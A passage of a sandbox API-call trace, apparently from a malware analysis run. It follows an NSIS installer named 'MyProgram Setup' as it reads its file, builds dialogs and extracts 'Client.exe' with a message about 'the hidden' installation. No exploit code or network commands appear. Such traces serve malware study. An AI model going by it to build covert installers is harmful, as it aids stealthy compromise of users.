lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.669] GetTickCount () returned 0x1d5e7b9 [0258.670] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.670] GetTickCount () returned 0x1d5e7b9 [0258.670] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.827] GetTickCount () returned 0x1d5e864 [0258.827] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.827] GetTickCount () returned 0x1d5e864 [0258.827] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.828] GetTickCount () returned 0x1d5e864 [0258.828] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.828] GetTickCount () returned 0x1d5e864 [0258.828] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.828] GetTickCount () returned 0x1d5e864 [0258.828] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.829] GetTickCount () returned 0x1d5e864 [0258.830] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.830] GetTickCount () returned 0x1d5e864 [0258.830] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.830] GetTickCount () returned 0x1d5e864 [0258.830] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.831] GetTickCount () returned 0x1d5e864 [0258.831] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.831] GetTickCount () returned 0x1d5e864 [0258.831] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.832] GetTickCount () returned 0x1d5e864 [0258.832] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.832] GetTickCount () returned 0x1d5e864 [0258.832] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.832] GetTickCount () returned 0x1d5e864 [0258.832] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.843] GetTickCount () returned 0x1d5e874 [0258.843] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.843] GetTickCount () returned 0x1d5e874 [0258.844] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.844] GetTickCount () returned 0x1d5e874 [0258.844] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.844] GetTickCount () returned 0x1d5e874 [0258.844] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.845] GetTickCount () returned 0x1d5e874 [0258.845] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.845] GetTickCount () returned 0x1d5e874 [0258.845] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.846] GetTickCount () returned 0x1d5e874 [0258.846] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.846] GetTickCount () returned 0x1d5e874 [0258.846] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.847] GetTickCount () returned 0x1d5e874 [0258.848] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.848] GetTickCount () returned 0x1d5e874 [0258.848] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.848] GetTickCount () returned 0x1d5e874 [0258.848] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.849] GetTickCount () returned 0x1d5e874 [0258.849] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.849] GetTickCount () returned 0x1d5e874 [0258.849] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.850] GetTickCount () returned 0x1d5e874 [0258.850] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.850] GetTickCount () returned 0x1d5e874 [0258.850] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.851] GetTickCount () returned 0x1d5e874 [0258.851] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.852] GetTickCount () returned 0x1d5e874 [0258.852] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.853] GetTickCount () returned 0x1d5e874 [0258.853] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.853] GetTickCount () returned 0x1d5e874 [0258.853] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.853] GetTickCount () returned 0x1d5e874 [0258.854] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.854] GetTickCount () returned 0x1d5e874 [0258.854] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.854] GetTickCount () returned 0x1d5e874 [0258.854] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.855] GetTickCount () returned 0x1d5e874 [0258.855] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.855] GetTickCount () returned 0x1d5e874 [0258.855] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.857] GetTickCount () returned 0x1d5e874 [0258.857] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.857] GetTickCount () returned 0x1d5e874 [0258.857] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.858] GetTickCount () returned 0x1d5e884 [0258.858] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.858] GetTickCount () returned 0x1d5e884 [0258.858] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0258.859] GetTickCount () returned 0x1d5e884 [0258.859] ReadFile (in: hFile=0x1e0, lpBuffer=0x421428, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesRead=0x18fda8*=0x1100, lpOverlapped=0x0) returned 1 [0258.859] GetTickCount () returned 0x1d5e884 [0258.859] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=1998592, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e7f00 [0258.859] ReadFile (in: hFile=0x1e0, lpBuffer=0x18fdf4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x18fdf4*, lpNumberOfBytesRead=0x18fda8*=0x4, lpOverlapped=0x0) returned 1 [0258.859] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=60444, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xec1c [0258.860] ReadFile (in: hFile=0x1e0, lpBuffer=0x18fdb4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x18fdb4*, lpNumberOfBytesRead=0x18fd30*=0x4, lpOverlapped=0x0) returned 1 [0258.861] GetTickCount () returned 0x1d5e884 [0258.861] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x554, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fd30*=0x554, lpOverlapped=0x0) returned 1 [0258.861] GetTickCount () returned 0x1d5e884 [0258.861] SetFilePointer (in: hFile=0x1e0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf174 [0258.862] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x769b0000 [0258.862] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultUILanguage") returned 0x769c4463 [0258.862] GetUserDefaultUILanguage () returned 0x409 [0258.862] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0258.862] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0258.862] lstrlenA (lpString="MyProgram") returned 9 [0258.862] lstrcpynA (in: lpString1=0x42ec00, lpString2="MyProgram Setup", iMaxLength=1024 | out: lpString1="MyProgram Setup") returned="MyProgram Setup" [0258.862] SetWindowTextA (hWnd=0x0, lpString="MyProgram Setup") returned 0 [0258.862] lstrcpynA (in: lpString1=0x2a4d04, lpString2="exesvcname", iMaxLength=1024 | out: lpString1="exesvcname") returned="exesvcname" [0258.862] lstrcpynA (in: lpString1=0x2a511c, lpString2="EXTRACT", iMaxLength=1024 | out: lpString1="EXTRACT") returned="EXTRACT" [0258.862] lstrcpynA (in: lpString1=0x42bc70, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0258.863] lstrcpynA (in: lpString1=0x42bc70, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0258.864] GetVersion () returned 0x1db10106 [0258.864] GetWindowsDirectoryA (in: lpBuffer=0x42e3a0, uSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0258.864] lstrlenA (lpString="C:\\Windows") returned 10 [0258.864] lstrcpynA (in: lpString1=0x435400, lpString2="C:\\Windows\\", iMaxLength=1024 | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0258.864] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x901a5 [0258.865] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0258.865] lstrlenA (lpString="MyProgram") returned 9 [0258.866] lstrcpynA (in: lpString1=0x42ec00, lpString2="MyProgram Setup", iMaxLength=1024 | out: lpString1="MyProgram Setup") returned="MyProgram Setup" [0258.866] SetWindowTextA (hWnd=0x0, lpString="MyProgram Setup") returned 0 [0258.866] lstrcpynA (in: lpString1=0x2a4d04, lpString2="exesvcname", iMaxLength=1024 | out: lpString1="exesvcname") returned="exesvcname" [0258.866] lstrcpynA (in: lpString1=0x2a511c, lpString2="EXTRACT", iMaxLength=1024 | out: lpString1="EXTRACT") returned="EXTRACT" [0258.866] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0258.866] GetSystemDirectoryA (in: lpBuffer=0x18fca8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0258.866] wsprintfA (in: param_1=0x18fcbb, param_2="%s%s.dll" | out: param_1="\\RichEd20.dll") returned 13 [0258.866] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x6be20000 [0259.484] GetClassInfoA (in: hInstance=0x0, lpClassName="RichEdit20A", lpWndClass=0x42eba0 | out: lpWndClass=0x42eba0) returned 1 [0259.485] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403ad5, dwInitParam=0x0) [0259.940] GetDlgItem (hDlg=0x401e4, nIDDlgItem=1) returned 0x70020 [0259.940] GetDlgItem (hDlg=0x401e4, nIDDlgItem=2) returned 0x401d2 [0259.941] SetDlgItemTextA (hDlg=0x401e4, nIDDlgItem=1028, lpString="Nullsoft Install System v3.01") returned 1 [0259.941] SetClassLongA (hWnd=0x401e4, nIndex=-14, dwNewLong=590245) returned 0x0 [0259.943] lstrcpynA (in: lpString1=0x437800, lpString2="Click Next to continue.", iMaxLength=1024 | out: lpString1="Click Next to continue.") returned="Click Next to continue." [0259.943] SetDlgItemTextA (hDlg=0x401e4, nIDDlgItem=1, lpString="&Close") returned 1 [0259.943] SetDlgItemTextA (hDlg=0x401e4, nIDDlgItem=3, lpString="") returned 1 [0259.943] SetDlgItemTextA (hDlg=0x401e4, nIDDlgItem=2, lpString="Cancel") returned 1 [0259.943] GetDlgItem (hDlg=0x401e4, nIDDlgItem=3) returned 0x6021e [0259.943] ShowWindow (hWnd=0x6021e, nCmdShow=0) returned 0 [0259.943] EnableWindow (hWnd=0x6021e, bEnable=0) returned 0 [0259.943] EnableWindow (hWnd=0x70020, bEnable=0) returned 0 [0259.943] EnableWindow (hWnd=0x401d2, bEnable=0) returned 0 [0259.944] GetSystemMenu (hWnd=0x401e4, bRevert=0) returned 0xc01ab [0259.944] EnableMenuItem (hMenu=0xc01ab, uIDEnableItem=0xf060, uEnable=0x1) returned 0 [0259.944] SendMessageA (hWnd=0x6021e, Msg=0xf4, wParam=0x0, lParam=0x1) returned 0x0 [0259.944] SendMessageA (hWnd=0x401e4, Msg=0x28, wParam=0x70020, lParam=0x1) returned 0x1 [0259.944] lstrcpynA (in: lpString1=0x42a868, lpString2="MyProgram Setup", iMaxLength=1024 | out: lpString1="MyProgram Setup") returned="MyProgram Setup" [0259.944] lstrlenA (lpString="MyProgram Setup") returned 15 [0259.944] lstrcpynA (in: lpString1=0x42a877, lpString2=": Installing", iMaxLength=1024 | out: lpString1=": Installing") returned=": Installing" [0259.944] SetWindowTextA (hWnd=0x401e4, lpString="MyProgram Setup: Installing") returned 1 [0259.945] DestroyWindow (hWnd=0x0) returned 0 [0259.945] CreateDialogParamA (hInstance=0x400000, lpTemplateName=0x6a, hWndParent=0x401e4, lpDialogFunc=0x40511a, dwInitParam=0x2a4c6c) returned 0x40300 [0260.707] GetDlgItem (hDlg=0x40300, nIDDlgItem=1027) returned 0x20320 [0260.707] GetDlgItem (hDlg=0x40300, nIDDlgItem=1006) returned 0x20324 [0260.707] GetDlgItem (hDlg=0x40300, nIDDlgItem=1016) returned 0x302f8 [0260.708] SendMessageA (hWnd=0x401e4, Msg=0x28, wParam=0x20320, lParam=0x1) returned 0x1 [0260.824] GetClientRect (in: hWnd=0x302f8, lpRect=0x18f6f0 | out: lpRect=0x18f6f0) returned 1 [0260.824] GetSystemMetrics (nIndex=2) returned 17 [0260.824] SendMessageA (hWnd=0x302f8, Msg=0x101b, wParam=0x0, lParam=0x18f6d0) returned 0x0 [0261.000] SendMessageA (hWnd=0x302f8, Msg=0x1036, wParam=0x4000, lParam=0x4000) returned 0x0 [0261.017] SendMessageA (hWnd=0x302f8, Msg=0x1001, wParam=0x0, lParam=0x0) returned 0x1 [0261.017] SendMessageA (hWnd=0x302f8, Msg=0x1026, wParam=0x0, lParam=0x0) returned 0x1 [0261.017] SendMessageA (hWnd=0x302f8, Msg=0x1024, wParam=0x0, lParam=0xff00) returned 0x1 [0261.017] SetDlgItemTextA (hDlg=0x40300, nIDDlgItem=1027, lpString="Show &details") returned 1 [0261.017] GetDlgItem (hDlg=0x40300, nIDDlgItem=1004) returned 0x302fe [0261.018] SendMessageA (hWnd=0x302fe, Msg=0x401, wParam=0x0, lParam=0x75300000) returned 0x640000 [0261.018] SetDlgItemTextA (hDlg=0x40300, nIDDlgItem=1006, lpString="") returned 1 [0261.018] GetDlgItem (hDlg=0x401e4, nIDDlgItem=1018) returned 0x1501f4 [0261.018] GetWindowRect (in: hWnd=0x1501f4, lpRect=0x18fa54 | out: lpRect=0x18fa54) returned 1 [0261.018] ScreenToClient (in: hWnd=0x401e4, lpPoint=0x18fa54 | out: lpPoint=0x18fa54) returned 1 [0261.018] SetWindowPos (hWnd=0x40300, hWndInsertAfter=0x0, X=11, Y=10, cx=0, cy=0, uFlags=0x15) returned 1 [0261.019] ShowWindow (hWnd=0x40300, nCmdShow=8) returned 0 [0261.019] SendMessageA (hWnd=0x40300, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0261.019] GetDlgItem (hDlg=0x40300, nIDDlgItem=1004) returned 0x302fe [0261.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4050ae, lpParameter=0x302fe, dwCreationFlags=0x0, lpThreadId=0x18f80c | out: lpThreadId=0x18f80c*=0xcf4) returned 0x1f8 [0261.022] CloseHandle (hObject=0x1f8) returned 1 [0261.022] ShowWindow (hWnd=0x401e4, nCmdShow=10) returned 0 [0261.038] GetWindowLongA (hWnd=0x401e4, nIndex=-21) returned 0 [0261.039] SetWindowPos (hWnd=0x0, hWndInsertAfter=0x401e4, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 0 [0261.049] GetWindowLongA (hWnd=0x401e4, nIndex=-21) returned 0 [0261.050] GetWindowLongA (hWnd=0x70020, nIndex=-21) returned 0 [0261.050] GetWindowLongA (hWnd=0x70020, nIndex=-21) returned 0 [0261.107] GetWindowLongA (hWnd=0x401d2, nIndex=-21) returned 0 [0261.107] GetWindowLongA (hWnd=0x401d2, nIndex=-21) returned 0 [0261.108] GetWindowLongA (hWnd=0x40302, nIndex=-21) returned 0 [0261.109] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.109] GetWindowLongA (hWnd=0x20320, nIndex=-21) returned 0 [0261.110] GetWindowLongA (hWnd=0x20320, nIndex=-21) returned 0 [0261.114] GetWindowLongA (hWnd=0x401e4, nIndex=-21) returned 0 [0261.115] GetWindowLongA (hWnd=0x70020, nIndex=-21) returned 0 [0261.116] GetWindowLongA (hWnd=0x401d2, nIndex=-21) returned 0 [0261.117] GetWindowLongA (hWnd=0x60106, nIndex=-21) returned 0 [0261.117] GetWindowLongA (hWnd=0x40302, nIndex=-21) returned 0 [0261.118] GetWindowLongA (hWnd=0x40300, nIndex=-21) returned 0 [0261.122] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.122] GetWindowLongA (hWnd=0x30318, nIndex=-21) returned 0 [0261.123] GetWindowLongA (hWnd=0x20320, nIndex=-21) returned 0 [0261.173] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.178] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.181] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.184] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.194] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.410] SetWindowPos (hWnd=0x0, hWndInsertAfter=0x401e4, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 0 [0261.415] GetWindowLongA (hWnd=0x20320, nIndex=-21) returned 0 [0261.423] GetWindowLongA (hWnd=0x20320, nIndex=-21) returned 0 [0261.423] ShowWindow (hWnd=0x20320, nCmdShow=0) returned 1 [0261.424] GetWindowLongA (hWnd=0x40300, nIndex=-21) returned 0 [0261.425] ShowWindow (hWnd=0x302f8, nCmdShow=8) returned 0 [0261.425] GetWindowLongA (hWnd=0x40300, nIndex=-21) returned 0 [0261.426] SendMessageA (hWnd=0x401e4, Msg=0x28, wParam=0x302f8, lParam=0x1) returned 0x1 [0261.669] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0261.674] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0270.913] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0270.917] GetWindowLongA (hWnd=0x40300, nIndex=-21) returned 0 [0272.629] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0272.634] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0272.642] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0272.838] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0272.860] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0272.961] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0273.022] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0273.025] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0273.367] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0275.522] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 [0277.470] GetWindowLongA (hWnd=0x20324, nIndex=-21) returned 0 Thread: id = 205 os_tid = 0xcd0 Thread: id = 206 os_tid = 0xcd4 Thread: id = 207 os_tid = 0xcf4 [0261.171] OleInitialize (pvReserved=0x0) returned 0x0 [0261.171] SendMessageA (hWnd=0x40300, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0261.172] lstrcpynA (in: lpString1=0x40a410, lpString2="Client.exe", iMaxLength=1024 | out: lpString1="Client.exe") returned="Client.exe" [0261.172] lstrlenA (lpString="Client.exe") returned 10 [0261.172] lstrcpynA (in: lpString1=0x438000, lpString2="Client.exe", iMaxLength=1024 | out: lpString1="Client.exe") returned="Client.exe" [0261.172] MulDiv (nNumber=1, nNumerator=30000, nDenominator=60) returned 500 [0261.172] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1f4, lParam=0x0) returned 0x0 [0261.173] lstrcpynA (in: lpString1=0x42a048, lpString2="We remind you of the responsibility for the hidden", iMaxLength=1024 | out: lpString1="We remind you of the responsibility for the hidden") returned="We remind you of the responsibility for the hidden" [0261.173] lstrlenA (lpString="We remind you of the responsibility for the hidden") returned 50 [0261.173] SetWindowTextA (hWnd=0x20324, lpString="We remind you of the responsibility for the hidden") returned 1 [0261.176] SendMessageA 